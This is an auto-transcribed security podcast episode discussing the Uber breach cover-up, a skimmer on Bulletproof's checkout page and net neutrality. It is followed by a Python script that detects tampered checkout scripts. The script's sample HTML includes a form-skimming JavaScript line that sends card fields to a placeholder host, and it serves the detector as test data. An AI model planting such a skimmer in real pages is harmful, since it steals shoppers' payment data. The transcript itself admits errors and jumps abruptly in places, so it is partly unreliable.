This transcript was generated automatically, probably contains mistakes, and has not been manually verified.
Graham Cluley
What is a hamburger? A hamburger is different from a beef burger, right? Because ham comes from pigs.
Carole Theriault
Yeah, that's not where the name comes from. It's Hamburg, the place.
Graham Cluley
Oh, really?
Carole Theriault
Yeah.
Unknown
And it's nothing to do with Hamburglers? No. Smashing Security, Episode 55: Uber, Net Neutrality, and Website Hacks with Carole Theriault and Graham Cluley. Hello, hello, and welcome to another episode of Smashing Security, episode 55, for the 30th of November, 2017. I'm Graham Cluley.
Carole Theriault
And I'm Carole Theriault.
Graham Cluley
And once again, we are going to dive into the murky waters of cybersecurity. But hey, Carole, in the last regular episode, we missed a big story, didn't we?
Carole Theriault
Oh yeah, we did.
Graham Cluley
Uber's farcical data breach incident, 57 million account users found that they had been compromised by a hack. A hack which is said to have happened back in October 2016, but has only been made public a year later. Not because Uber didn't know about it, but because Uber covered it up.
Carole Theriault
I know, it's so shameful. I think you should just tell the story, just give the highlights of how it actually happened from what you've pieced together so far, because it's just fascinating.
Graham Cluley
It seems that Uber found out October 2016 that they'd been hacked and these attackers had accessed a GitHub coding site used by some Uber engineers. They'd stolen credentials, which they grabbed from there to access an Amazon Web Services account where Uber had other information. And via that, the hackers were able to make off with all this information. So far, so normal for a data breach. But of course, this is Uber, which I don't know if you've ever traveled by Uber, but I found them— I have. Yeah, it's really convenient, right? It's a great app. And you think, wow, this is amazing. I'm in a taxi. Woo-hoo. Working, but by all accounts, not that great a company.
Carole Theriault
Totally loved giving them my credit card details as well. Loved that bit.
Graham Cluley
In some ways similar to Amazon, right? Where you get a fantastic service, but there are reports that maybe they're not a terrific company.
Carole Theriault
Reports. There's been like, they've not stopped being in the news for the last at least 6 months.
Graham Cluley
Well, here's the interesting thing. So they discovered this data breach had occurred. And it appears that Uber covered it up. Their security team, which was led at the time by Joe Sullivan—
Carole Theriault
Someone that we've had a few encounters with.
Graham Cluley
We've had a couple of run-ins with Joe in our past. Yeah.
Carole Theriault
Hi, Joe, if you're listening.
Graham Cluley
Well, I doubt it. When we've written about Facebook security issues. Well, he moved on to Uber and he was spearheading the company's response to the breach by giving the attackers $100,000 in the form of a bug bounty in order to keep the breach quiet. And please don't do anything with the data.
Carole Theriault
It's shut the fuck up money, right?
Graham Cluley
That's exactly right. And they didn't inform anyone, didn't inform the users, didn't inform the authorities who were already investigating Uber for a number of other reasons.
Carole Theriault
No one will ever know.
Graham Cluley
Well, unfortunately, the new CEO who came in in September this year just found out about it last week and kicked Joe and one of Joe's buddies out of Uber and said, "You're no longer running security because we can't trust you." And said that this was reprehensible, which I think it was, quite frankly. I think it's not so much the paying of the hackers because that does happen. Of course, hackers do try and extort money out of businesses and sometimes it can be pragmatic, maybe to pay the hackers, that's one whole debate. What I think is outrageous is not telling those users, not coming clean and saying we've had a security incident and trying to sweep it under the carpet.
Carole Theriault
It is quite cool that the new CEO has basically, you feel like she's lifted up a bit of furniture and found this hornet's nest.
Graham Cluley
I know their name is Dara, but I've got a feeling it's a chap. I'll just Google Image and try and work it out. Oh yes, Dara has got a beard. Okay, yes, Dara is a man.
Carole Theriault
Anyway, so I'm going to say that again. So I think it's good that at least the new CEO has come in and, you know, however opened a drawer and found this hornet's nest and is coming clean, even though it's going to hurt the reputation. It's not good for Uber as a company.
Graham Cluley
What reputation? Uber has got an appalling reputation as it is already. This is the only sensible course of action it can take because if any more cans of worms like this are discovered, it's gonna be the death of this. Well, would it though? I wonder if, I mean, you know, I have to ask myself, would I not use Uber after this?
Carole Theriault
Yeah, this is the thing, right? You're gonna say in your head, "Well, I already have an account with Uber. And they already have my credit card details, and I'm gonna trust they're doing everything right with that. So I'm just gonna carry on using the service 'cause it's so useful when I land at some airport in the middle of the night and there's no, you know." And I think that's actually the case with most of the hacks we hear about. Everyone gets really upset for a week or two, but who actually closes their accounts? And convenience often wins over security, doesn't it? I think I have had it once, but I don't even actually remember what my impression was of it, so maybe I never have had it.
Graham Cluley
Well, Bulletproof claims to do wonders to your brain and help you lose weight.
Carole Theriault
Yeah, I've read about it. I've totally read about it. I just think this is all a pile of garbage, but yes.
Graham Cluley
It sounds awfully trendy and funky. And when you read up about it, the chap who founded the company, a guy called Dave Asprey, he claims to have spent two decades and over $1 million biohacking himself. I think a biological hack is basically going on a diet. But he claims that you can help — you can also similarly upgrade your brain like he lifted his IQ by 20 points, he says, and lower your biological age and learn to sleep more efficiently by drinking his coffee.
Not the opinion of the podcast. Well, Bulletproof unfortunately has suffered a security incident. They've been sending letters to some of their customers, and they say that they identified in the middle of last month that unauthorized computer code had been added to their website on the page which operates their checkout, where you buy all your beans and ingredients to buy this mega coffee.
Carole Theriault
Right, right.
Graham Cluley
And that means that the bad guys have got your bank card numbers, your expiry dates, your security codes, your names, your postal addresses, and your email addresses. And this was going on from May 20th to October 19th.
Carole Theriault
Shut the front door! That's — is that 6 months?
Graham Cluley
5 months, I think. Yeah. Apart from one day, October 14th, when apparently, according to the letter, details weren't being grabbed. Now, what on earth is that about? Is that because their website was down? I don't understand. But apparently October 14th, you're safe. The other days, you've got a problem.
Carole Theriault
Weird.
Graham Cluley
I can't begin to understand why that was.
Carole Theriault
Yeah. But clearly, you know, something seriously and badly went wrong, although I could find no mention of this on Bulletproof's own website. So you have to wait until your letter comes through to tell you if you've got a problem with this or not. You know, there's a lot of people out there with websites that they may hire a third party to create the website and make it secure as they can at that stage, but then they don't maintain it and they don't keep someone that knows their stuff. They just think, oh, I can update a plugin or I can, you know, just do a few little things and things get out of date or things can be broken like this and there's no one there to spot this stuff.
Graham Cluley
Yeah. And they really should probably have spotted that code had been changed on their website for that length of time, particularly on such a critical part of their website where compromise is basically disastrous, isn't it? Right. Well, they said they're going to reimburse affected customers for any reasonable documented costs if your bank refused to pay you back.
Carole Theriault
And of course, they're full of regret and apologies for— You need to go out now and change your credit card details, change your credit card number.
Graham Cluley
Well, yeah, I mean, normally your expiry date is a couple of years in advance, isn't it? So the bad guys have got a couple of years to take advantage of it unless you change your number. Obviously, always makes sense.
It sounds like the kind of thing which could be good for big businesses and for the telecoms companies, because it's another way to screw more money out of you, but a bad thing for the typical individual, really, isn't it? I mean, it's just going to end up with the internet costing you more, or you being a second-class citizen because you can't access certain sites or use certain web services.
Carole Theriault
Well, over last weekend, this was Thanksgiving holiday in the US, the FCC decided to release, well, some would say sneak out, the final draft of its net neutrality proposal. This is the order to roll back the 2015 net neutrality protections that the Obama administration put in place. This rollback means that internet providers like Verizon and Comcast and AT&T will be able to block content. So this is online services, apps, and websites. And they can also throttle internet services, basically artificially slowing speeds and fast-lane those that pay more. So, you know, imagine, for example, you snuggle down to binge some Netflix only to find that your ISP has made it unwatchable just by throttling the bandwidth.
Graham Cluley
Yeah. Eek.
Carole Theriault
In order to encourage you to move to a more expensive plan, for example. Or imagine you can't access Facebook or other internet services, or you only have a set number of hours each month.
Graham Cluley
So the scenario might be that when you buy your internet package, you would have to tick the box saying, oh yes, I'd like to be able to watch Netflix, or I'd like it to be speedier in some fashion, or give me access to these bits of the internet. Otherwise, you go for a cheap option where you sort of get a second-class internet.
Carole Theriault
That's what everyone is worrying about, exactly. But it goes worse than that. Imagine also maybe a sensitive political brouhaha is gaining steam and the ISP decides to block information on the topic or just provide you with a single point of view. So—
Graham Cluley
The good news, Carole, is there are no political brouhahas.
Carole Theriault
Exactly.
Graham Cluley
At the moment. Things have got really, really soft.
Carole Theriault
It's tickety-boo out there. Smooth sailing. Yeah, I don't want him.
Graham Cluley
Yeah, exactly.
Carole Theriault
Yuck. Get your hands off me. Now, worse than that, any state-level regulations that contradict the FCC's order— the one that they have in proposal right now would be preempted. So in other words, you can't rely on local legislation to protect you. So according to The Verge, there's only one rule left here that ISPs have to publicly disclose when they're doing these things. So I guess I might say that on the plus side, you're always going to know when you're getting fucked. I'm just trying to shock you a little bit, wake you up, you know? Come on, I've sworn twice now. Now, the FCC gave the public just 3 weeks to send feedback before the vote's going to be put up and the final decision is going to be made. Now, the question is, why would the FCC reveal this over a holiday weekend? You know, they're probably hoping that Americans are too busy stuffing their faces with sweet potato and marshmallow and turkey and all the things that they eat.
Graham Cluley
What's your favorite Dickens book, Carole? Well, all at the same time.
Carole Theriault
At exactly the same time.
Graham Cluley
Sweet potato with marshmallow and turkey.
Carole Theriault
No, no, no, not turkey. So sweet potato and marshmallow is definitely a dish.
Graham Cluley
Really? Yes. I've also been fed something that was horseradish and lime Jell-O as a side dish to turkey. I'm not kidding. They should have taken heed.
Carole Theriault
They should have taken heed. The internet scrambled into action. And as Slate puts it, "If you're concerned about the fact that the internet could be a very different place in less than two months, now is a very good time to rabble-rouse." So there's a few things going on right now. One is battleforthenet.com. This is—we've talked about these guys before in an earlier podcast, but this is a site that's dedicated to saving net neutrality. And they've registered already 500,000 calls to Congress on this issue. And protests to oppose this draft are being organized outside Verizon stores across the country. And these are going to take place on December 7th. Free Press Action Fund has set up a team internet, #TeamInternet. There's a dozen new petitions to fight net neutrality on change.org. Reddit is just slammed with people calling for action. And Reddit is actually, there's a really good—I'm gonna put this in the show notes—there's a really moving post actually by Reddit to the community and it's a great read. So all these things are going on. So those people that wanna get involved, there are things that you can do. What not to do, however, and this is based on a segment on Fox News. So some activists have been going to Ajit Pai's home in suburban Virginia with signs directed at his children.
Graham Cluley
And Ajit Pai is the chap at the FCC.
Carole Theriault
He's the chairman of the FCC.
Graham Cluley
Yes.
Carole Theriault
Yes. So these signs are saying things like, "They will come to know the truth. Dad murdered democracy in cold blood." That's pretty harsh. So on this, I agree with Pai. Families should just remain out of it. Don't harass people at home. I think they should be completely left out of it. Now, the fact that Donald Trump appointed Ajit Pai to be FCC chairman, and one refers to net neutrality as "Obama's net neutrality," seems to kind of have radically politicized this whole issue. And from an outside point of view, I really urge people to ignore the politics here. This is more about deregulating a service that many see as the backbone of everything—of innovation, of communication, of technology, a free and open internet. Yes, or maybe you're offering a brand new service, or you're a not-for-profit, or you're a school. And if they don't have the cash in their back pocket to pay for that super slick highway. So I say, if you agree—if you think net neutrality is a good thing, you should go and do something about it. And I don't want it to wither and die. I don't want it to be censored. And there's loads of links in the show notes here. But if you don't, I expect you have your own good reasons, and they're simply beyond me.
Graham Cluley
But I guess— so I guess our message is just because our Lord and Savior Barack Obama thought net neutrality was a good idea shouldn't mean that people who don't like Barack Obama think that net neutrality is a bad idea.
Carole Theriault
Can I just share a factoid with you?
Graham Cluley
Yes, please.
Carole Theriault
How did net neutrality start? It's always been called the Obama thing, but actually it first started under Michael Powell, who was a Republican-appointed chairman at the FCC. And what happened was in 2005, a small phone company based in North Carolina basically began preventing its subscribers from making phone calls using that internet application Vonage because Vonage was a competitor in the phone call market. This action was obviously anti-competitive. So consumers complained and the FCC promptly fined the company and forced it to stop blocking Vonage.
Graham Cluley
Carole, you are such a font of information.
Carole Theriault
A font of information.
Graham Cluley
Well, I think that's what you say, isn't it? Font?
Carole Theriault
It is. It is. I was—
Graham Cluley
Have I done well?
Carole Theriault
I was impressed with you knowing that word.
Graham Cluley
I don't mean font like Helvetica.
Carole Theriault
Calibri.
Graham Cluley
Tahoma.
Carole Theriault
Now, it's a very important time now because we're going to hear from our sponsors, aren't we? Yay!
Are you worried that your website might be the backdoor through which hackers can access your information and steal data?
Pick of the Week. Everyone on the show chooses something they like. Could be a funny story, a book they've read, a TV show, a movie, a record, an app, a website, a podcast, whatever you like. Good, because it shouldn't be, right?
Graham Cluley
It is instead handy because you watch a lot of YouTube videos, right, Carole?
Carole Theriault
Yeah, I've been known to peruse the YouTube.
Graham Cluley
Yeah, right. Well, there are YouTube secret keyboard shortcuts. I don't know if you knew about these. So rather than grabbing your mouse, you can just quickly flick a finger and pause a video by pressing the K button.
Carole Theriault
Well, sorry, the spacebar works to pause a video, you know.
Graham Cluley
Okay, yes, you can use space as well. But listen, listen, fast forward with L, rewind with J, or you can watch frame by frame, forwards or backwards, by pressing the dot or comma key.
Carole Theriault
Okay, okay, that's pretty cool. I didn't know that.
Graham Cluley
Pretty funky stuff. So you can just move forward. You can mute or unmute by pressing M. You can turn captions on and off by pressing C. It's actually kind of handy. Yeah, it's pretty neat. So that is my pick of the week.
Carole Theriault
I'm surprised by your pick of the week because I was convinced you were going to talk about something else. Here, let me get the link for you. Let me get the link for you. Okay, there you go. Click on that and tell me if you read about this and then tell me why, if you have, why it's not interesting and why it wasn't your pick of the week.
Graham Cluley
Okay, so you have sent me a link about Tom Baker. Oh, I love Tom Baker. Tom Baker was the fourth Doctor Who, back in the '70s. And the reason why Tom Baker's in the news this week— I don't like to talk too much about Doctor Who because this could become the Doctor Who podcast.
Carole Theriault
No, it will not. Over my dead body.
Graham Cluley
So in 1979, I think we may have mentioned actually in a past show, there was a scrapped episode of Doctor Who. They half filmed it. It was called Shada, written by Douglas Adams, and it was never completed.
Carole Theriault
Stop showing off!
Graham Cluley
It's just basic Doctor Who knowledge. And what the BBC have done is they have released a version where they've animated the missing parts of the story. And right at the very end, apparently— spoilers— of the show, they have some live footage of Tom Baker, who's now about 83 years old, in his Doctor Who costume in the TARDIS. They actually filmed it on a grubby old videotape studio with the old console and everything, so it looks like the real thing. Him there with his shock of white hair now, of course, and he's got a few lines and it's rather gorgeous. And— oh, sorry, I fell asleep. Hey, you were the one who thought this should be my pick of the week!
Carole Theriault
Yeah, I didn't mean— Do you have a second pick of the week?
Graham Cluley
Well, no, I'm not saying it's a week, but you were just pointing me at it. But yeah, I do love Tom Baker. I think he's mad as a box of frogs.
Carole Theriault
Well, makes two of you.
Graham Cluley
But yeah, I've never actually been a fan of Shada, to be honest. I don't think it's Doctor Who's finest.
Carole Theriault
I have no idea what you're even talking about. I just saw Tom Baker and Doctor Who in the headline, and that was it. Yeah, it was about as deep as that. So my pick of the week this week is an interview show and podcast called The Rubin Report, and specifically its most recent episode, which is on bitcoin. So The Rubin Report, if you're unaware, is a political talk show that airs on YouTube and it's hosted by Dave Rubin. And it is actually also a podcast. That's where I first heard about it. And I've listened to a few shows and think it's quite a cool little podcast where Rubin interviews some amazing person, an author, an activist, a journalist, comedian, professors, actors, et cetera. The latest one is called Bitcoin: How Does It Work? The interviewee is a first investor in Bitcoin.com and Blockchain.com, and he's by the name of Roger Ver. And it's a really good overview to help you understand the bitcoin cryptocurrency's ins and outs. And it's about an hour long, and it's a really good show to keep in your back pocket over the holidays if your in-laws or someone starts asking you to explain what all this bitcoin stuff is. Because you can send them just the link to the YouTube, or if they're podcast listeners, you can send it to them.
Graham Cluley
Or you can pretend to be an expert yourself. You listen to it and then hopefully pass on the wisdom. So what do you think of Bitcoin? Are you— because bitcoin price, they've been zooming up.
Carole Theriault
$10,000 I read today.
Graham Cluley
It's astonishing.
Carole Theriault
Yeah. So early investors obviously are laughing all their way to the bank. So it's no surprise that this person, Roger Ver, is obviously going to be touting the joys of bitcoin and blockchain, right? Because he certainly has money to make out of it, but he makes a lot of good points. You know, they're all in the press about how much money is going to be made, you are going to be asked about it, right? So may as well have an easy answer to explain because what if your parents want to start investing in it, right?
Graham Cluley
The bitcoin bubble has got to burst soon though, surely, hasn't it?
Carole Theriault
Loads of people are saying that. I don't know how anyone would predict one way or the other.
Graham Cluley
Just seems to be so cheap.
Carole Theriault
But it hasn't been going— people have been saying that for about 5 years.
Graham Cluley
Right. You know what? We should do an episode sometime all about blockchain.
Carole Theriault
I agree. I think we've said that a few episodes ago. I agree.
Graham Cluley
Yeah. My brother has been hassling me saying, when are you going to talk about blockchain?
Carole Theriault
Does he really talk like that? Jeez.
Graham Cluley
Poor guy.
Carole Theriault
I haven't seen him in a while, so.
Graham Cluley
Well, thank you very much, Carole, for that pick of the week. We've got a guest lined up for next week. That's fun, isn't it? Yeah.
Carole Theriault
We have a special surprise for our year-end show, don't we?
Graham Cluley
Yes, we do.
Carole Theriault
Yep. No, no, no. Just saying. Just saying.
Graham Cluley
Yeah, we've got some surprises in store, so make sure that you subscribe to the podcast in Apple iTunes or your favorite podcast app so that you don't miss any future episodes. If you want to follow us on Twitter, we're @SmashingSecurity without a G. And we're also on Facebook. Look for the Smashing Security group up there. And we've got swag as well. You can buy not just t-shirts, you can buy mugs and you can buy cushions.
Carole Theriault
Very ginormous cushions you can buy, can't you, Graham? Well, and give them to your friend as a birthday present.
Graham Cluley
It's pretty cool though, isn't it? I saw a photo of you and you seem to be enjoying it. Go to smashingsecurity.com/store. That just about wraps it up. All that remains is to say thank you for tuning in. If you know someone else who might like the show, please tell them about it. Until next time, cheerio, bye-bye.
Carole Theriault
Later, guys. Goodbye.
Graham Cluley
I'm going to press stop. Do you know what?
Carole Theriault
At this stage, I think George Bush is my lord and savior as well.
Graham Cluley
Which one? The one—
Carole Theriault
I don't mind.
Graham Cluley
The one with the groping hands?
Carole Theriault
Compared to what's going on right now. Oh no, no, God, you can't say that. He was involved with the harassment stuff.
Graham Cluley
Yes, that's it.
Carole Theriault
I was talking, I didn't hear you.
EPISODE DESCRIPTION:
Uber covers up a data breach, the noose tightens on net neutrality, and Bulletproof's website spills the data beans.
All this and much much more is discussed in the latest edition of the "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by umm.. nobody because they didn't arrange a special guest.
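The Bulletproof incident discussed in the episode (unauthorized code added to the checkout page and left there for about five months) is the textbook case for integrity monitoring of a payment page: a site owner who keeps a known-good record of exactly which scripts the checkout loads can detect a skimmer the day it lands rather than when the card-fraud letters go out. The block below is an added example written for this page; it is not code from the podcast, from Bulletproof, or from any vendor. It assumes you have captured a trusted baseline of the checkout HTML from a clean deployment, that your own scripts are same-origin or served from hosts you list explicitly, and that the HTML strings in the block are constructed sample pages (the "injected" page contains a made-up skimmer that posts form fields to a placeholder `.invalid` host). It uses only the Python standard library.

```python
"""Detect unauthorized script changes on a checkout page (added example).

Fingerprint every <script> on the page: external scripts by their src URL,
inline scripts by the SHA-256 of their body. Diff the live page against a
known-good baseline and flag anything added, removed, or served from a host
that is not on the allow-list. Stdlib only; sample HTML is constructed.
"""
import hashlib
import json
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of src="..." on <script> tags
        self.inline = []        # raw bodies of <script> tags without src
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser treats <script> content as CDATA, so the whole body
        # arrives here verbatim, including any '<' characters inside it.
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._in_inline = False


def fingerprint(html: str) -> dict:
    """Return {"external": [src, ...], "inline": {sha256: body, ...}}."""
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    inline = {}
    for body in p.inline:
        body = body.strip()
        if body:
            inline[hashlib.sha256(body.encode("utf-8")).hexdigest()] = body
    return {"external": sorted(set(p.external)), "inline": inline}


def compare(baseline: dict, current: dict, allowed_hosts=()) -> dict:
    """Diff a live fingerprint against the baseline.

    Relative src values (no hostname) are treated as same-origin and never
    flagged as foreign. An empty allowed_hosts disables the host check.
    """
    added_external = sorted(set(current["external"]) - set(baseline["external"]))
    removed_external = sorted(set(baseline["external"]) - set(current["external"]))
    added_inline = sorted(set(current["inline"]) - set(baseline["inline"]))
    removed_inline = sorted(set(baseline["inline"]) - set(current["inline"]))
    foreign_hosts = []
    if allowed_hosts:
        for src in current["external"]:
            host = urlparse(src).hostname
            if host and host not in allowed_hosts:
                foreign_hosts.append(src)
    report = {
        "added_external": added_external,
        "removed_external": removed_external,
        "added_inline": added_inline,
        "removed_inline": removed_inline,
        "foreign_hosts": sorted(foreign_hosts),
    }
    report["tampered"] = any(report[k] for k in report)
    return report


# Constructed sample pages. The baseline is what the shop deployed; the
# "injected" page is the same HTML with a skimmer added at the end of <body>.
BASELINE_HTML = """<html><head>
<script src="/static/checkout.js"></script>
<script>window.cfg = {currency: "USD"};</script>
</head><body><form id="pay"><input name="card"></form></body></html>"""

INJECTED_HTML = BASELINE_HTML.replace("</body>", (
    '<script src="https://cdn-stats.example.invalid/c.js"></script>\n'
    '<script>document.getElementById("pay").addEventListener("submit",'
    'function(){new Image().src="https://cdn-stats.example.invalid/p?d="'
    '+encodeURIComponent(JSON.stringify(Object.fromEntries(new FormData(this))))'
    '});</script>\n</body>'))

ALLOWED_HOSTS = ("shop.example",)   # hypothetical first-party host


def check_page(html: str, baseline_html: str = BASELINE_HTML) -> dict:
    """Convenience wrapper: fingerprint both pages and diff them."""
    return compare(fingerprint(baseline_html), fingerprint(html), ALLOWED_HOSTS)


if __name__ == "__main__":
    print(json.dumps(check_page(INJECTED_HTML), indent=2))
```

In production you would run `fingerprint()` against the live checkout URL on a schedule, store the baseline fingerprint somewhere the web server cannot write to, and page on `tampered`. Hashing inline bodies rather than diffing the whole page keeps the check stable across cosmetic template changes while still catching a one-line injected `<script>`, and the host allow-list catches the common case where the skimmer is loaded from an attacker-controlled CDN instead of inlined.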